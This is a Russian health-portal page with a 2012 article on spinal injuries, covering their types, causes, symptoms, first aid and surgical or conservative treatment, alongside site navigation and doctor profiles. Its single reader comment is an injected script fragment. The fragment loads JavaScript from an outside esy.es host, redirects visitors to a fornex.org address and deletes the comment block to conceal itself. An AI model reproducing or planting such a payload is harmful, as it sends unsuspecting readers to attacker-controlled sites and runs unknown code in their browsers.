Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Травмы позвоночника  >>  Травмы позвоночника
 
Обратная связь
 

Травмы позвоночника

Размер шрифта
22 мая 2012 10:00
  • google_analytics: false
  • Нравится

Позвоночник – это основной элемент скелета человека и футляр для спинного мозга. Поэтому травмы позвоночника опасны прежде всего повреждением спинного мозга. Чем проявляются травмы позвоночника, и как их лечат?

Классификация травм позвоночника

  • Все травмы позвоночника можно разделить на неосложненные, без повреждения спинного мозга, и осложненные, сопровождающиеся параличами, нарушениями чувствительности и болями в конечностях.
  • Также различают стабильные и нестабильные переломы. При стабильных повреждениях позвоночника признаки патологической подвижности элементов позвоночника отсутствуют, а при нестабильных переломах возможно смещение позвонков с повреждением нервов.
  • Взрывные переломы  возникают в том случае, когда фрагменты рядом расположенных межпозвонковых дисков проникают в позвонок, разрывая его изнутри.

Причины

Повреждения позвонков чаще возникают при непрямом механизме травмы:

  • осевая нагрузка (падение с высоты на ноги, на ягодицы или на голову);
  • резкое или чрезмерное сгибание;
  • разгибание;
  • скручивание позвоночника.

Иногда могут сочетаться две и даже три причины травмы позвоночника.

Симптомы

  • Напряжение мышц спины, болезненность при ощупывании позвонков, сильная боль в области шеи или спины.
  • Неестественное положение шеи или спины.
  • Слабость, онемение или нарушение двигательной функции конечностей.
  • Паралич конечностей.
  • Нарушение контроля над функцией мочевого пузыря или кишечника.

Первая помощь при травме позвоночника

При оказании помощи человеку с подозрением на травму позвоночника следует соблюдать особую осторожность. Пострадавший не должен самостоятельно садиться, вставать на ноги и переворачиваться. Существует несколько правил:

  1. Обеспечить покой, уложив его на ровной твердой поверхности (доске, щите и др.).

  2. Перекладывать и перемещать пострадавшего должны одновременно несколько человек, удерживая туловище все время на одном уровне, не допуская сгибания позвоночника. Если под рукой нет ровного твердого приспособления для переноски, допускается перемещать пострадавшего на матерчатых носилках, уложив его на живот.

  3. При повреждении шейного отдела пострадавшего перевозят в положении лежа на спине, зафиксировав голову на одном уровне с туловищем. Зафиксировать голову можно, уложив ее на импровизированный «бублик», свернутый из одежды.

Лечение травм позвоночника

В случае осложненных переломов позвонков показано хирургическое лечение в максимально ранние сроки: чем раньше будет произведена операция, тем выше вероятность полного восстановления функций спинного мозга.

  • Консервативное лечение. При неосложненных переломах в грудном и поясничном отделах возможно консервативное лечение, с условием внешней иммобилизации, или фиксации, в течение 12 месяцев с момента получения травмы. В шейном отделе позвоночника иммобилизация необходима до 6 месяцев.
  • Оперативное лечение. Пациентам, которые ведут активный образ жизни, оперативное лечение, как правило, проводится даже при неосложненных травмах позвоночника. Современные хирургические технологии позволяют вернуть пациенту активность на 5-7 сутки с момента операции, а при операции на шейном отделе – на 1 сутки. Длительность реабилитационного периода у таких пациентов составляет 6 недель со дня операции, после чего они возвращаются к привычному образу жизни.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
История пациента. Максим, горнолыжник   Вам хочется секса, а у мужа болит спина! Как получить свое?   Магниты убивают детей! Как их защитить?   Как посадить ребенка в машину  
18 декабря 2012Травма головы увеличивает риск развития болезни Паркинсона 14 февраля 2012Почему футболисты не возвращаются в спорт
 
23 сентября 2011Физкультура до добра не доводит? 01 сентября 2011Врачи вытащили из глазницы мужчины садовые ножницы
 

Слайдшоу

1
Привычки, которые убивают вашу спину
Боль в пояснице: можно ли без лекарств?!
Как избавиться от боли в спине

Тесты

1
Какой матрас вам подходит?
Какая у вас стадия остеохондроза?
Рискуете ли вы заболеть остеохондрозом?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.